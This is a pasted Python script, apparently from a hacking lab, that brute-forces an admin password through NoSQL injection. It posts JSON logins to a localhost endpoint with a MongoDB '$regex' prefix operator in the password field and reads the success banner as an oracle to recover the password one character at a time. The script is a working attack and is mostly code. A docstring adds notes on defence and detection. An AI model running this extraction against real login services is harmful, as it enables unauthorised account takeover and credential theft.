vic_npc

NoSQL-password-force brute

May 27th, 2023 (edited)
  1. #!/use/bin/python3
  2.  
  3. from pwn import *
  4. import requests, time, sys, signal, string
  5.  
def def_handler(sig, frame):
    """Handle an interrupt signal: print an exit notice and stop with status 1.

    Both arguments are the standard signal-handler parameters and are unused.
    """
    farewell = "\n\n[!] Saliendo...\n"
    print(farewell)
    raise SystemExit(1)
  9.  
# Ctrl+C: install def_handler as the SIGINT handler.
signal.signal(signal.SIGINT, def_handler)

# Global settings
# Login endpoint on localhost that the requests are posted to.
login_url = "http://localhost:4000/user/login"
# Candidate alphabet: ASCII lowercase, then uppercase, then digits.
characters = string.ascii_letters + string.digits
  16.  
def makeNoSQLI():
    """Recover the ``admin`` password from the login endpoint, one character at a time.

    Each request posts a JSON body whose ``password`` field is an object
    holding a ``$regex`` operator anchored at the start of the value
    (``^<known prefix><candidate>``). The response text is used as a yes/no
    oracle: when it contains ``"Logged in as user"`` the candidate is kept
    and the next position is tried. At most 24 positions are attempted and
    only ``characters`` are tested. Nothing is returned; progress is shown
    through the two pwntools progress loggers.

    Defensive reading: this only works when the server passes a
    client-supplied object straight into its credential lookup. Requiring
    ``username`` and ``password`` to be plain strings before they reach the
    query (or rejecting keys that start with ``$``), and verifying a
    password hash in application code instead of matching the stored field
    inside the query, removes the oracle. On the detection side the pattern
    is a burst of login POSTs for a single account whose bodies carry
    ``$regex`` in the password field.
    """
    recovered = ""

    attack_bar = log.progress("Fuerza bruta")
    attack_bar.status("Iniciando proceso de fuerza bruta")

    time.sleep(2)

    password_bar = log.progress("Password")

    for _ in range(24):
        for candidate in characters:
            # Anchored prefix match: characters confirmed so far plus the one under test.
            body = '{"username":"admin","password":{"$regex":"^%s%s"}}' % (recovered, candidate)
            attack_bar.status(body)

            response = requests.post(
                login_url,
                headers={'Content-Type': 'application/json'},
                data=body,
            )

            # The success banner in the response is the only signal used.
            if "Logged in as user" not in response.text:
                continue

            recovered += candidate
            password_bar.status(recovered)
            break
  41.  
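# Run the routine only when the file is executed as a script, not on import.
# The guard needs the double-underscore names: `_name_` is an undefined
# variable and raises NameError as soon as the module is loaded.
if __name__ == '__main__':
    makeNoSQLI()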